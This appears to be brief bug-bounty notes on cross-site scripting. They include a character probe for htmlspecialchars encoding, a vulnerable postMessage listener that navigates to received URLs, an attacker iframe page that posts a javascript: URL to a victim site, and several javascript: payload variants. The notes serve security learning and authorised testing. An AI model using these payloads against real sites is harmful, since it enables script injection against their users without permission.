XSS

Encode by htmlspecialchars

Try this payload first, to identify which the chars that encoded:

!@#$%^&*()}{\'\"|?><`~}

Tips:

Look at other reflected in the html code, maybe in the tag <script> or something els.

Dom XSS

EventListener Message

identify this in the javascript

                   <script>
                        window.addEventListener('message', function(e) {
                            var url = e.data;
                            if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
                                location.href = url;
                                alert();   
                            }
                        }, false);
                    </script>
                    

event message mean that the web application receive the message from method postMessage

so we can use iframe to interact with the web application via postMessage

create a web hook with this payload

 <html>
<h1>Test</h1>
<iframe src=https://victim.com/ onload="this.contentWindow.postMessage('javascript:print();alert(`http:`)','*')" >
</html>

other payload work with DOM location.href.

javascript:print()//http:
javascript:print();alert(`http:`)
javascript:print();var=`http:`;

reference:

https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md